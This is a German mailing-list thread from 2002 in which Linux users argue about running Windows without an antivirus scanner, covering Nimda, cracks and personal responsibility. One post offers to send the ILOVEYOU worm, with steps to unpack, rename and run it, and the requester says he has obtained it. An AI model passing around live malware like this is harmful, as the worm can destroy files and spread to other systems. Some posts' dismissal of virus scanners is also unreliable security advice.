Ist ja nicht direkt Fahrlässigkeit, sondern die Einstellung keine Performance an so etwas abgeben zu wollen. Ich habe halt nur einen 700er MHz Athlon - noch dazu mit nur 128 MB RAM, und um mit dem noch irgendetwas einigermaßen Spielen zu können braucht man ihm halt alles abverlangen was möglich ist.

Wir können ja tauschen. Willst du einen von meinen 3 486ern, den IP-120 oder doch lieber den IP-133? cu flo -- Wer War Das? Wer Hatt vergessen die Hillner Virus Impfung vorzunehemen. Jetzt ist schon wieder einer Infiziert. Exhumination Collifarum Plastrum. [WoKo in dag°]

Martin Neuditschko

6 Jan 6 Jan

09:41

On Sat, Jan 05, 2002 at 06:51:27PM +0100, Florian Gross wrote:

...

* Martin Neuditschko textete am 04.01.02:

...
On Fri, Jan 04, 2002 at 07:59:08PM +0100, Andreas Allgeyer wrote:

...
Am Freitag, 4. Januar 2002 17:26 schrieb Florian Gross:

...
...
...
ACK! Ich wünsche dir einen Virus, der dir mal wirklich _alles_ plattmacht. Dann änderst du deine Einstellung vielleicht.

Das wünsche ich eigentlich niemanden. Nicht mal, wenn er sich selbst - aus Fahrlässigkeit - zum Verteiler macht.

Ich kenne genug, die Virenschutz haben und trotzdem spielen. Und die haben keinen P4...

Iiiih ein Intel. Nur gut, daß Intel um ein Eck teurer und noch dazu um ein Eck langsamer sind. (Es ist z. B. der Athlon XP/1800 schneller als der P4 2000, wobei man noch mitrechnen muß, daß der Athlon mit 1600MHz getaktet ist und der P4 mit 2000MHz -> Der Athlon hat 400MHz weniger, ist viel günstiger und ist auch noch schneller).

...

...
Ist ja nicht direkt Fahrlässigkeit, sondern die Einstellung keine Performance an so etwas abgeben zu wollen. Ich habe halt nur einen 700er MHz Athlon - noch dazu mit nur 128 MB RAM, und um mit dem noch irgendetwas einigermaßen Spielen zu können braucht man ihm halt alles abverlangen was möglich ist.

Wir können ja tauschen. Willst du einen von meinen 3 486ern, den IP-120 oder doch lieber den IP-133?

Du hast wohl noch nie so etwas wie Unreal Tournament gesehen. Das ist ca. zur gleichen Zeit herausgekommen, als ich meinen neuen Rechner gekauft habe, und wenn ich die Grafikeinstellungen überall auf Maximum stelle, dann fängt es schon bei mehreren Gegnern mit 800x600(!!!) ins ruckeln an. (Ich glaube du hast die letzten 3 Zeilen meines vorherigen Absatzes übersehen) -- mfg Martin Neuditschko

Florian Gross

18:44

* Martin Neuditschko textete am 06.01.02:

...

On Sat, Jan 05, 2002 at 06:51:27PM +0100, Florian Gross wrote:

...
* Martin Neuditschko textete am 04.01.02:

...
On Fri, Jan 04, 2002 at 07:59:08PM +0100, Andreas Allgeyer wrote:

...
Am Freitag, 4. Januar 2002 17:26 schrieb Florian Gross:

...
...
...
ACK! Ich wünsche dir einen Virus, der dir mal wirklich _alles_ plattmacht. Dann änderst du deine Einstellung vielleicht.

Das wünsche ich eigentlich niemanden. Nicht mal, wenn er sich selbst - aus Fahrlässigkeit - zum Verteiler macht.

Ich kenne genug, die Virenschutz haben und trotzdem spielen. Und die haben keinen P4...

Iiiih ein Intel. Nur gut, daß Intel um ein Eck teurer und noch dazu um ein Eck langsamer sind. (Es ist z. B. der Athlon XP/1800 schneller als der P4 2000, wobei man noch mitrechnen muß, daß der Athlon mit 1600MHz getaktet ist und der P4 mit 2000MHz -> Der Athlon hat 400MHz weniger, ist viel günstiger und ist auch noch schneller).

Eben. Ich hab' ja auch _keinen_ P4 geschrieben.

...

...
...
Ist ja nicht direkt Fahrlässigkeit, sondern die Einstellung keine Performance an so etwas abgeben zu wollen. Ich habe halt nur einen 700er MHz Athlon - noch dazu mit nur 128 MB RAM, und um mit dem noch irgendetwas einigermaßen Spielen zu können braucht man ihm halt alles abverlangen was möglich ist.

Wir können ja tauschen. Willst du einen von meinen 3 486ern, den IP-120 oder doch lieber den IP-133?

Du hast wohl noch nie so etwas wie Unreal Tournament gesehen. Das ist ca. zur gleichen Zeit herausgekommen, als ich meinen neuen Rechner gekauft habe, und wenn ich die Grafikeinstellungen überall auf Maximum stelle, dann fängt es schon bei mehreren Gegnern mit 800x600(!!!) ins ruckeln an. (Ich glaube du hast die letzten 3 Zeilen meines vorherigen Absatzes übersehen)

Nö. Da ich schon lange nicht mehr spiele, sind solche Rechner auch kein Thema für mich. OK, der P-133 geht manchmal schon in die Knie, wenn man so Spielereien wie StarOffice, Netscape, Mozilla und XEmacs gleichzeitig laufen hat und nebenher nochwas kleines kompiliert... *g* cu flo -- Das liebste Spielzeug eines Trolls ist der Dau. Wobei der Dau selber ein Troll sein kann. Das kann so weiterDAUern, bis er merkt das er nur mit sich selbst gespielt hatt. [WoKo in dag°]

Christian Sprenger

4 Jan 4 Jan

08:04

New subject: AW: Ext. Zugriffe auf Webserver...

[...]

...

...
Klar. Deswegen bretter ich auch immer mit 120 durch 'ne Tempo 30-Zone.

Wie, spielende Kinder auf der Strasse? Ach das macht die Flecken auf der Motorhaube ...

Sorry Junge. Aber Du bist nicht allein auf der Welt. Sobald man sich irgendwo in der Öffentlichkeit bewegt, hat man eine gewisse Verantwortung. Nicht nur juristisch, sondern vor allem moralisch.

Das verstehe ich jetzt nicht ganz. Immer wenn ich mir einen Virus eingefangen habe, wußte ich das ich mir einen einfange. Das war 2 mal. Es waren so schöne pif-Attachments von Mails. Ich habe sie geöffnet un zu sehen wie schnell man merkt, das etwas nicht mehr richtig funzt. Und ich glaube niemand, der Spielt hat einen Virenscanner laufen. 1: Der Virenscanner hat einen Performanceverlust zur Folge.

Dafür kann man die Teile ja auch in den meisten Fällen temporär deaktivieren.

...

2: Wenn der Virenscanner plötzlich auf der Platte zum Scannen anfängt kann man das Spiel sowieso vergessen. Meist ist man dann ganz schnell tot.

Siehe oben :-)

...

Der Hauptgrund: Woher soll ich einen Virus bekommen? Ich hatte noch nie unvorhergesehen einen Virus. Die Viren die ich hatte habe ich selbst "gestartet". Die Viren haben immer nur das System befallen, nie eigene Daten was mich noch immer stutzig macht.

Viele Leute die ganz gerne auf dem PC spielen, nutzen "Sicherungskopien". Um diese zum laufen zubekommen, werden in den meisten Fällen Crackz aus dem Internet gezogen. Dies wiederrum passiert meistens über recht unsichere Seiten. Bei einigen dieser Seiten kann man Crackz nur über den IE downloaden, und das auch einen ganz einfachen Grund: Durch die ungemeine "Bedienerfreundlichkeit" des IE werden ganz autom. Trojaner, etc. auf deinem System installiert. Und seien es nur kleine Tools die unbemerkt, sobald du online gehts, die derzeitige IP deines Systems an obskure Gestalten übermitteln. Inzwischen sind auch viele Virenscanner soweit, das sie solche Tools aufspüren. Sicher ist jedoch die Benutzung von Tools wie z.B. TDS (ja ist ein Windows-Tool :-) ).

...

PS: Aber was hat das mit den 120 km/h durch ne 30er-Zone zu tun?

Ich glaube das hat ein wenig was mit dem Thema "Eigenverantwortung" zu tun ;-)

...

mfg Martin Neuditschko

--------------------------------- Christian Sprenger Windhorst Electronics GmbH Systemadministration Werner-von-Siemens-Str. 6-10 32369 Rahden fon 0 57 71 / 9 12 - 0 fax 0 57 71 / 9 12 - 2 80 mailto:c.sprenger@windhorst.de http://www.windhorst.de

Martin Neuditschko

08:28

On Fri, Jan 04, 2002 at 08:04:31AM +0100, Christian Sprenger wrote:

...

...
PS: Aber was hat das mit den 120 km/h durch ne 30er-Zone zu tun?

Ich glaube das hat ein wenig was mit dem Thema "Eigenverantwortung" zu tun ;-)

Häh? Es kann doch den anderen egal sein was ich bei mir zu Hause mache. Und wenn ich mich selbst in die Luft sprengen würde ist das doch egal. -- mfg Martin Neuditschko

Rene Engelhard

09:38

Martin Neuditschko wrote:

...

On Fri, Jan 04, 2002 at 08:04:31AM +0100, Christian Sprenger wrote:

...
...
PS: Aber was hat das mit den 120 km/h durch ne 30er-Zone zu tun?

Ich glaube das hat ein wenig was mit dem Thema "Eigenverantwortung" zu tun ;-)

Häh? Es kann doch den anderen egal sein was ich bei mir zu Hause mache.

Nein, wenn Du unwissend etwas verbreitest (Viren), dann geht das die anderen doch schon etwas an...

...

Und wenn ich mich selbst in die Luft sprengen würde ist das doch egal.

Das ist was ganz anderes (die Nachbarn -- insbesondere rechts, links, eine Etage drüber und eine drunter -- würde ich trotzdem vorher warnen, je nachdem wie stark der Sprengsatz ist...) *SCNR* Rene

Martin Neuditschko

09:53

On Fri, Jan 04, 2002 at 09:38:03AM +0100, Rene Engelhard wrote:

...

Martin Neuditschko wrote:

...
On Fri, Jan 04, 2002 at 08:04:31AM +0100, Christian Sprenger wrote:

...
...
PS: Aber was hat das mit den 120 km/h durch ne 30er-Zone zu tun?

Ich glaube das hat ein wenig was mit dem Thema "Eigenverantwortung" zu tun ;-)

Häh? Es kann doch den anderen egal sein was ich bei mir zu Hause mache.

Nein, wenn Du unwissend etwas verbreitest (Viren), dann geht das die anderen doch schon etwas an...

Und wie soll ich Viren verbreiten? Ich biete keine Dienste an und Mails verschicke ich Plain-Text. -- mfg Martin Neuditschko

Rene Engelhard

10:03

Martin Neuditschko wrote:

...

On Fri, Jan 04, 2002 at 09:38:03AM +0100, Rene Engelhard wrote:

...
Martin Neuditschko wrote:

...
On Fri, Jan 04, 2002 at 08:04:31AM +0100, Christian Sprenger wrote:

...
...
PS: Aber was hat das mit den 120 km/h durch ne 30er-Zone zu tun?

Ich glaube das hat ein wenig was mit dem Thema "Eigenverantwortung" zu tun ;-)

Häh? Es kann doch den anderen egal sein was ich bei mir zu Hause mache.

Nein, wenn Du unwissend etwas verbreitest (Viren), dann geht das die anderen doch schon etwas an...

Und wie soll ich Viren verbreiten? Ich biete keine Dienste an und Mails verschicke ich Plain-Text.

Und? Wir beziehen uns auf Deine sorglose Nutzung unter Windows. (oder stehe ich da auf dem Schlauch? ) Da kannst du alleine schon beim öffnen einer bestimmten Seite (IE) oder bestimmten Mail (O / OjE) einen Virus einfangen. Ohne Virenscanner unter Windows ist so sorglos und unverantwortlich. Ich habe nebenbei (nur für seltene Anwendungen benutzt) auch ein Windows installiert und ohne Virenscanner würde ich das _nie_ benutzen. Rene

Martin Neuditschko

10:52

On Fri, Jan 04, 2002 at 10:03:55AM +0100, Rene Engelhard wrote:

...

Martin Neuditschko wrote:

...
On Fri, Jan 04, 2002 at 09:38:03AM +0100, Rene Engelhard wrote:

...
Martin Neuditschko wrote:

...
On Fri, Jan 04, 2002 at 08:04:31AM +0100, Christian Sprenger wrote:

...
...
PS: Aber was hat das mit den 120 km/h durch ne 30er-Zone zu tun?

Ich glaube das hat ein wenig was mit dem Thema "Eigenverantwortung" zu tun ;-)

Häh? Es kann doch den anderen egal sein was ich bei mir zu Hause mache.

Nein, wenn Du unwissend etwas verbreitest (Viren), dann geht das die anderen doch schon etwas an...

Und wie soll ich Viren verbreiten? Ich biete keine Dienste an und Mails verschicke ich Plain-Text.

Und?

Wir beziehen uns auf Deine sorglose Nutzung unter Windows. (oder stehe ich da auf dem Schlauch? )

Wenn man Windows nutzt ist man sowieso sorglos. Ich bin auch sicher, daß wenn man mit dem IE auf eine MS-Seite zugreift die haargenau wissen was man alles auf dem Rechner installiert hat, und sie ziemlich sicher alles mit dem System anstellen könnten was sie wollen, obwohl man selbst als Standarduser auf manche Dateien gar nicht zugreifen kann. Desswegen finde ich es sowieso unsinnig Sicherheit vorzutäuschen wo keine ist. Und wenn ich etwas mache, dann gleich gescheit oder gar nicht, denn wenn ich einen Virenscanner laufen lasse muß ich ihn ca. jedes Monat updaten und das geht ins Geld. Und von billig-Virenscanner und Freeware-Scanner halte ich sowieso nichts. So etwas ist genau das selbe: Sicherheit vor- täuschen wo keine ist. So weiß ich wenigstens, daß ich nicht geschützt bin und verlasse mich nicht auf irgendwelchen Mist.

...

Ohne Virenscanner unter Windows ist so sorglos und unverantwortlich.

Das ist Windows sowieso. IMO auch mit der besten Firewall.

...

Ich habe nebenbei (nur für seltene Anwendungen benutzt) auch ein Windows installiert und ohne Virenscanner würde ich das _nie_ benutzen.

Ich verwende es im Prinzip nur für PC-Spiele. Und Linux verwende ich im Prinzip auch nur zum "Spielen" (Ich probiere halt verschiedene Dinge aus, die ich eigentlich überhaupt nicht brauche, nur weil es mich interressiert - z. B. Einen DHCP-Daemon für einen einzigen Clienten, gnauso mit Samba als PDC, Oder Squid als Caching Proxie, obwohl der PDC und Squid durch den lahmen Server nur Nachteile bringen). -- mfg Martin Neuditschko

Rene Engelhard

11:15

Martin Neuditschko wrote:

...

On Fri, Jan 04, 2002 at 10:03:55AM +0100, Rene Engelhard wrote:

...
Martin Neuditschko wrote:

...
Und wie soll ich Viren verbreiten? Ich biete keine Dienste an und Mails verschicke ich Plain-Text.

Und?

Wir beziehen uns auf Deine sorglose Nutzung unter Windows. (oder stehe ich da auf dem Schlauch? )

Wenn man Windows nutzt ist man sowieso sorglos. Ich bin auch sicher, daß wenn man mit dem IE auf eine MS-Seite zugreift die haargenau wissen was man alles auf dem Rechner installiert hat, und sie ziemlich sicher alles mit dem System anstellen könnten was sie wollen, obwohl man selbst als Standarduser auf manche Dateien gar nicht zugreifen kann. Desswegen finde ich es sowieso unsinnig Sicherheit vorzutäuschen wo keine ist.

Ich surfe unter Windows nicht (nur unter Linux) aber wenn ausnahmsweise mal dann benutze ich Netscape oder Mozilla.

...

Und wenn ich etwas mache, dann gleich gescheit oder gar nicht, denn wenn ich einen Virenscanner laufen lasse muß ich ihn ca. jedes Monat updaten und das geht ins Geld. Und von billig-Virenscanner und Freeware-Scanner halte ich sowieso nichts. So etwas ist genau das selbe: Sicherheit vor-

Es gibt auf http://free-av.de einen Virenscanner, der für den privaten (nicht-komerziellen) Einsatz kostenfrei ist und den man auch automatisch updaten kann...

...

täuschen wo keine ist. So weiß ich wenigstens, daß ich nicht geschützt bin und verlasse mich nicht auf irgendwelchen Mist.

Super. Tolle Einstellung :-(

...

...
Ohne Virenscanner unter Windows ist so sorglos und unverantwortlich.

Das ist Windows sowieso. IMO auch mit der besten Firewall.

Das ist natürlich richtig. Aber man kann versuchen, es dann wenigstens verantwortungsvoll zu bedienen und zu konfigurieren. Und ohne Virenscanner da herumzuwurschteln ist da nicht gerade förderlich... Rene

Maik Holtkamp

12:50

Hy, Am 02/01/04@10:52 schrieb Martin Neuditschko:

...

Und wenn ich etwas mache, dann gleich gescheit oder gar nicht, denn wenn ich einen Virenscanner laufen lasse muß ich ihn ca. jedes Monat updaten und das geht ins Geld. Und von billig-Virenscanner und Freeware-Scanner halte ich sowieso nichts. So etwas ist genau das selbe: Sicherheit vor- täuschen wo keine ist. So weiß ich wenigstens, daß ich nicht geschützt

Qualität = Löhnwäre oder je teurer desto besser? Würde ich so nicht unterschreiben. -- :wq-y Maik

Michael Raab

10:26

Hallo, at Fri, 4 Jan 2002 09:53:47 +0100 Martin Neuditschko wrote:

...

Und wie soll ich Viren verbreiten? Ich biete keine Dienste an und Mails verschicke ich Plain-Text.

Deine selbsterstellten hast Du vielleicht unter Kontrolle. Aber Outlook z.B. entwickelt bei einigen Mails eine gewisse Selbständigkeit. Und dann ist es durchaus möglich, das es soviel neue Opfer gibt, die der Anzahl in Deinem Adressbuch entsprechen. Auch wenn ein Virenscanner aktiv sein sollte, *muss* man drauf achten, welche Mail man öffnet und auf was man da anklickt. Das gilt nicht nur für Outlook. Das beste Beispiel war der Loveletter, der sehr grossen Schaden angerichtet hat. Gruß Michael -- Phone/Fax +49 7000 MACBYTE Registered Linux User #228306 HomePage http://www.macbyte.info/ http://counter.li.org/ GNU PGP-Key http://www.macbyte.info/shared/macbyte.asc ++ CGI-Hosting ++ Domains ++ Webspace ++ PHP Development ++

Martin Neuditschko

10:59

On Fri, Jan 04, 2002 at 10:26:57AM +0100, Michael Raab wrote:

...

Hallo,

at Fri, 4 Jan 2002 09:53:47 +0100 Martin Neuditschko wrote:

...
Und wie soll ich Viren verbreiten? Ich biete keine Dienste an und Mails verschicke ich Plain-Text.

Deine selbsterstellten hast Du vielleicht unter Kontrolle. Aber Outlook z.B. entwickelt bei einigen Mails eine gewisse Selbständigkeit. Und dann ist es durchaus möglich, das es soviel neue Opfer gibt, die der Anzahl in Deinem Adressbuch entsprechen. Auch wenn ein Virenscanner aktiv sein sollte, *muss* man drauf achten, welche Mail man öffnet und auf was man da anklickt. Das gilt nicht nur für Outlook.

Outlook habe ich vor Jahren einmal gestartet. Argh was für ein Mist. Ich wollte von Netscape umsteigen (zum Ausprobieren), aber als er beim Importieren der Mails über 1000 Mails ohne irgendeine Meldung einfach nicht importiert hat, habe ich es gleich wieder aufgegeben. Wie gesagt: Das ist schon länger her, und jetzt steht in meinem Maiheader: User-Agent: Mutt/1.3.24i

...

Das beste Beispiel war der Loveletter, der sehr grossen Schaden angerichtet hat.

Habe ich schon mal gehört. Gibt es den irgendwo zum Downloaden, oder so? Das ist doch wahrscheinlich in Java-Script bzw. J-Script programmiert. Die Syntax würde mich schon interressieren. -- mfg Martin Neuditschko

Michael Raab

11:38

Hallo, at Fri, 4 Jan 2002 10:59:25 +0100 Martin Neuditschko wrote:

...

Wie gesagt: Das ist schon länger her, und jetzt steht in meinem Maiheader: User-Agent: Mutt/1.3.24i

Ich habe zu meinen Windowszeiten Eudora genutzt und sämtliche Verknüpfungen von Outlook gekillt und Firewalltechnisch eingesperrt. Ich nutze jetzt seit einem Monat auch auf meiner Workstation Linux und nutze nun den MUA Sylpheed. Trotzdem lasse ich den Virenscanner laufen. Man kann ja nie wissen.

...

...
Das beste Beispiel war der Loveletter, der sehr grossen Schaden angerichtet hat.

Gibt es den irgendwo zum Downloaden,

Einfach mal google befragen. ;-)

...

Das ist doch wahrscheinlich in Java-Script bzw. J-Script programmiert. Die Syntax würde mich schon interressieren.

Programmiert wurde das Teil in VB-Script, was bei falscher Anwendung das gesamte System lahmlegen kann. Gruß Michael -- Phone/Fax +49 7000 MACBYTE Registered Linux User #228306 HomePage http://www.macbyte.info/ http://counter.li.org/ GNU PGP-Key http://www.macbyte.info/shared/macbyte.asc ++ CGI-Hosting ++ Domains ++ Webspace ++ PHP Development ++

Florian Gross

17:34

* Martin Neuditschko textete am 04.01.02: [Loveletter]

...

Habe ich schon mal gehört. Gibt es den irgendwo zum Downloaden, oder so? Das ist doch wahrscheinlich in Java-Script bzw. J-Script programmiert. Die Syntax würde mich schon interressieren.

VBS. Wer will, kann ihn als ILOVEYOU.txt.gz haben. Auspacken, in iloveyou.vbs umbenennen und starten. Aber bitte auf einem Standalone- Rechner ohne wichtige Daten. cu flo --

...

Anschließend schaltest du deinen PC aus und hängst dich auf. Oder umgekehrt Nach reiflicher Überlegung habe ich meinen PC an die Decke gehängt, kann aber jetzt meinen Ausschalter nicht finden. Was mache ich falsch? [Dieter Bruegmann und Eugen Schabenberger in dag°]

Andreas Allgeyer

20:01

Am Freitag, 4. Januar 2002 17:34 schrieb Florian Gross:

...

* Martin Neuditschko textete am 04.01.02:

[Loveletter]

...
Habe ich schon mal gehört. Gibt es den irgendwo zum Downloaden, oder so? Das ist doch wahrscheinlich in Java-Script bzw. J-Script programmiert. Die Syntax würde mich schon interressieren.

VBS. Wer will, kann ihn als ILOVEYOU.txt.gz haben. Auspacken, in iloveyou.vbs umbenennen und starten. Aber bitte auf einem Standalone- Rechner ohne wichtige Daten.

Würde ich nicht weitergeben. Ich habe in den letzten Wochen auch Viren jeder Sorte in meinem Postfach gefunden, aber ich rate davon ab, das Zeugs weiterzugeben. Nicht mal als Anschauungsmaterial, denn es gibt keine Garantie dafür, das es der Andere wirklich in einem Standalone-Sandkasten laufen lassen läßt. Und da Martin denkt, er hätte alles im Griff, wäre ich doppelt vorsichtig. Don't do it. Beste Grüße Andreas -- http://www.jazznrhythm.de http://www.atomicagebayoubeat.com

Florian Gross

5 Jan 5 Jan

18:54

* Andreas Allgeyer textete am 04.01.02:

...

Am Freitag, 4. Januar 2002 17:34 schrieb Florian Gross:

...
* Martin Neuditschko textete am 04.01.02:

[Loveletter]

...
Habe ich schon mal gehört. Gibt es den irgendwo zum Downloaden, oder so? Das ist doch wahrscheinlich in Java-Script bzw. J-Script programmiert. Die Syntax würde mich schon interressieren.

VBS. Wer will, kann ihn als ILOVEYOU.txt.gz haben. Auspacken, in iloveyou.vbs umbenennen und starten. Aber bitte auf einem Standalone- Rechner ohne wichtige Daten.

Würde ich nicht weitergeben. Ich habe in den letzten Wochen auch Viren jeder Sorte in meinem Postfach gefunden, aber ich rate davon ab, das Zeugs weiterzugeben. Nicht mal als Anschauungsmaterial, denn es gibt keine Garantie dafür, das es der Andere wirklich in einem Standalone-Sandkasten laufen lassen läßt. Und da Martin denkt, er hätte alles im Griff, wäre ich doppelt vorsichtig. Don't do it.

Wenn von ihm dann der Virus bei mir aufschlägt, schlägt Martin's e-mail-Adresse in meiner procmailrc auf. Bekommen wird er den Source so oder so. cu flo --

...

wer ueber solche texte lacht, braucht sich spaeter nicht zu wundern, wenn das prophezeite dann auch eintritt! Wer solche Texte prophezeit, braucht sich später erst recht nicht zu wundern, wenn das Prophezeite dann auch eintritt. ['Hesekiel 2000' und Michael Hoffmann in dag°]

Martin Neuditschko

6 Jan 6 Jan

09:48

On Sat, Jan 05, 2002 at 06:54:13PM +0100, Florian Gross wrote:

...

* Andreas Allgeyer textete am 04.01.02:

...
Am Freitag, 4. Januar 2002 17:34 schrieb Florian Gross:

...
* Martin Neuditschko textete am 04.01.02:

[Loveletter]

...
Habe ich schon mal gehört. Gibt es den irgendwo zum Downloaden, oder so? Das ist doch wahrscheinlich in Java-Script bzw. J-Script programmiert. Die Syntax würde mich schon interressieren.

VBS. Wer will, kann ihn als ILOVEYOU.txt.gz haben. Auspacken, in iloveyou.vbs umbenennen und starten. Aber bitte auf einem Standalone- Rechner ohne wichtige Daten.

Würde ich nicht weitergeben. Ich habe in den letzten Wochen auch Viren jeder Sorte in meinem Postfach gefunden, aber ich rate davon ab, das Zeugs weiterzugeben. Nicht mal als Anschauungsmaterial, denn es gibt keine Garantie dafür, das es der Andere wirklich in einem Standalone-Sandkasten laufen lassen läßt. Und da Martin denkt, er hätte alles im Griff, wäre ich doppelt vorsichtig. Don't do it.

Wenn von ihm dann der Virus bei mir aufschlägt, schlägt Martin's e-mail-Adresse in meiner procmailrc auf. Bekommen wird er den Source so oder so.

Jo, hab ihn schon, aber leider kenn ich mich mit VBScript nicht so gut aus. ^___^ Kann mir jemand sagen wie ein paar Java-Script Viren heißen? Und wie soll so ein Virus von mir bei dir aufschlagen? Wenn ich eine Mail bekomme, die nicht Plain text ist wird sie doch sowieso beim Antworten in plain text umgewandelt (zumindest macht das mutt - w3m bei mir so) und außerdem müßte das doch der ML-Server sowieso blocken, oder? -- mfg Martin Neuditschko

Florian Gross

18:46

* Martin Neuditschko textete am 06.01.02:

...

On Sat, Jan 05, 2002 at 06:54:13PM +0100, Florian Gross wrote:

...
* Andreas Allgeyer textete am 04.01.02:

...
Am Freitag, 4. Januar 2002 17:34 schrieb Florian Gross:

...
* Martin Neuditschko textete am 04.01.02:

[Loveletter]

Würde ich nicht weitergeben. Ich habe in den letzten Wochen auch Viren jeder Sorte in meinem Postfach gefunden, aber ich rate davon ab, das Zeugs weiterzugeben. Nicht mal als Anschauungsmaterial, denn es gibt keine Garantie dafür, das es der Andere wirklich in einem Standalone-Sandkasten laufen lassen läßt. Und da Martin denkt, er hätte alles im Griff, wäre ich doppelt vorsichtig. Don't do it.

Wenn von ihm dann der Virus bei mir aufschlägt, schlägt Martin's e-mail-Adresse in meiner procmailrc auf. Bekommen wird er den Source so oder so.

Jo, hab ihn schon, aber leider kenn ich mich mit VBScript nicht so gut aus. ^___^ Kann mir jemand sagen wie ein paar Java-Script Viren heißen?

Und wie soll so ein Virus von mir bei dir aufschlagen? Wenn ich eine Mail bekomme, die nicht Plain text ist wird sie doch sowieso beim Antworten in plain text umgewandelt (zumindest macht das mutt - w3m bei mir so) und außerdem müßte das doch der ML-Server sowieso blocken, oder?

Wenn ich aber in einem Adressbuch stehe, bringt mir das herzlich wenig, wenn der Listserver den Anhang killt. Dann bekomme ich die mail mit dem Virus nämlich direkt. Ich meinte auch nur, wenn du das Ding mit Windows usw. ausprbierst und die Kiste ins Netz kommt. cu flo --

...

Caligula??? Na Na Na! *fffggg* Frauen wie mich??? Was solln das heißen??? Wer Caligula nicht kennt, hat das Beste verpennt. [Nadine Tekin und Johanna Ostermann in dag°]

Christian Sprenger

4 Jan 4 Jan

17:38

New subject: AW: Ext. Zugriffe auf Webserver...

...

-----Ursprüngliche Nachricht----- Von: Martin Neuditschko [mailto:yosuke.tomoe@gmx.net] Gesendet: Freitag, 4. Januar 2002 08:28 An: SuSE-Linux Betreff: Re: Ext. Zugriffe auf Webserver...

...
Ich glaube das hat ein wenig was mit dem Thema "Eigenverantwortung" zu tun ;-)

Häh? Es kann doch den anderen egal sein was ich bei mir zu Hause mache. Und wenn ich mich selbst in die Luft sprengen würde ist das doch egal.

Nun gut :-) Ist wohl nicht möglich mit dir "normal" zu diskutieren.....

...

Martin Neuditschko

Yann Wissenbach

20:19

New subject: AW: Ext. Zugriffe auf Webserver...

-----Ursprüngliche Nachricht----- Von: Martin Neuditschko [mailto:yosuke.tomoe@gmx.net] Gesendet: Freitag, 4. Januar 2002 08:28 An: SuSE-Linux Betreff: Re: Ext. Zugriffe auf Webserver... On Fri, Jan 04, 2002 at 08:04:31AM +0100, Christian Sprenger wrote:

...

...
PS: Aber was hat das mit den 120 km/h durch ne 30er-Zone zu tun?

Ich glaube das hat ein wenig was mit dem Thema "Eigenverantwortung" zu tun ;-)

Häh? Es kann doch den anderen egal sein was ich bei mir zu Hause mache. Und wenn ich mich selbst in die Luft sprengen würde ist das doch egal. Hallo, NEIN, nicht solange du an einem öffentlichem netzwerk wie dem internet haengst ist das NICHT deine sache. damit schadest du anderen. und wenn du dich in die luft sprengst genauso: damit richtest du einen teuren schaden an. 1. fettflecken + blut entfernen 2. leiche abtransportieren und untersuchen 3. beerdigung !! 4. folgeschäden bei mitbewohnern oder angehörigen 5. verwaltungskosten 6. ... wenn du einen komplett getrennt laufenden PC hast, der an keinerlei netzwek haengt -von mir aus -, aber nicht solange jemand an ein netzwerk angeschlossen ist. ich finde es langsam zum kotzen, dass es immernoch idioten gibt, die den nimda verbreiten, und mir und anderen somit die log files zuhauen. auch in meiner firma kommt an JEDEN server andauernd nimda anfragen, und nur wegen solch leuten, wie hier teilweise im internet kursieren. -- MfG Yann Wissenbach www : http://www.world-wide-wait.de http://www.vw-opel-ig.de mail : yann@world-wide-wait.de ICQ : 98297452 Linux - Life is too short for reboots

Martin Neuditschko

21:28

On Fri, Jan 04, 2002 at 08:19:13PM +0100, Yann Wissenbach wrote:

...

wenn du einen komplett getrennt laufenden PC hast, der an keinerlei netzwek haengt -von mir aus -,

Dann ist es sowieso schwer einen Virus zu bekommen.

...

aber nicht solange jemand an ein netzwerk angeschlossen ist. ich finde es langsam zum kotzen, dass es immernoch idioten gibt, die den nimda verbreiten, Und ich bin immer noch sicher, daß ca. 50% der Windowsuser keinen Antivirus laufen haben.

...

und mir und anderen somit die log files zuhauen. auch in meiner firma kommt an JEDEN server andauernd nimda anfragen, und nur wegen solch leuten, wie hier teilweise im internet kursieren.

Und? Wenn dich das nervt, dann schreib ein Script oder konfigurier das Proggie welches diese Dinge loggt, so daß die Warnungen über solche Nebensächlichkeiten gar nicht ins logfile kommen. Nebensächlichkeit desswegen, weil das ja alltäglich ist und sowieso keinen Schaden anrichtet. Ein Logging das ein bekanntes Problem (das man nicht ausmerzen kann) immer und immer wieder loggt ist IMHO falsch konfiguriert. Ja, ich weiß das das manchmal nicht möglich ist. Bei mir wird ja auch alle paar Wochen die /var/log/messages gesichert weil sie über 5 MB gewachsen ist, und dabei verwende nur ich den Rechner.... Aber ich bin zu faul mich durch die ganzen man-pages zu schlagen und desswegen darf ich mich dann auch nicht aufregen, daß sie so schnell wächst. -- mfg Martin Neuditschko

Ratti

23:12

Hallo, Martin Neuditschko:

...

Und ich bin immer noch sicher, daß ca. 50% der Windowsuser keinen Antivirus laufen haben.

Schätzungsweise 90% haben keinen Virenscanner. Warum auch? Man sagt seinem Outlook, es soll keine Scripte ausführen - oder nimmt einen anderen MUA. Man nimmt nicht den IE, oder updatet ihn. Dafür gibt es die Updatefunktion. Bleibt das Einfallstor "Download von Programmen". Das ist aber bei allen OSsen gleich hoch - ich zumindest bin auf meinem Linux-Rechner nicht in der Lage, zu erkennen, was ich mir da mit make install oder rpm draufschiebe - zwangsläufig als root. Liest du alle Quelltexte durch, die du kompillierst? Natürlich ist das Risiko unter Win aufgrund der beschissenen Systemarchitektur und der teilweise merkwürdigen Userschaft ungleich größer - aber wie groß ist es "in Absolut"? Ich habe in den letzten Jahren keinen Windows-Virus zu Gesicht bekommen. Ausnahme: Besagter Mail/VBS/ActiveX-Blödsinn, und der ist leicht zu verhindern, siehe oben. Für den Verdachtsfall genügt ein simpler Scanner wie F-Prot, der manuell gestartet wird. Dazu gibt es nunmal keine Alternative. _Jeder_ mir bekannte Virenscanner, der sich unter Win ins System hängt, richtete noch immer mehr Schaden an, als er nützte. Da läuft nix mehr stabil, und genau deswegen habe ich völlig problemlos seit etlichen Jahren keinen Virenscanner - sowohl privat als auch in der Firma (Dort gibt es allerdings auch keine User Marke "Ich klick alles"). Gruß, Ratti

Andreas Allgeyer

23:16

Am Freitag, 4. Januar 2002 23:12 schrieb Ratti:

...

Dazu gibt es nunmal keine Alternative. _Jeder_ mir bekannte Virenscanner, der sich unter Win ins System hängt, richtete noch immer mehr Schaden an, als er nützte. Da läuft nix mehr stabil, und genau deswegen habe ich völlig problemlos seit etlichen Jahren keinen Virenscanner - sowohl privat als auch in der Firma (Dort gibt es allerdings auch keine User Marke "Ich klick alles").

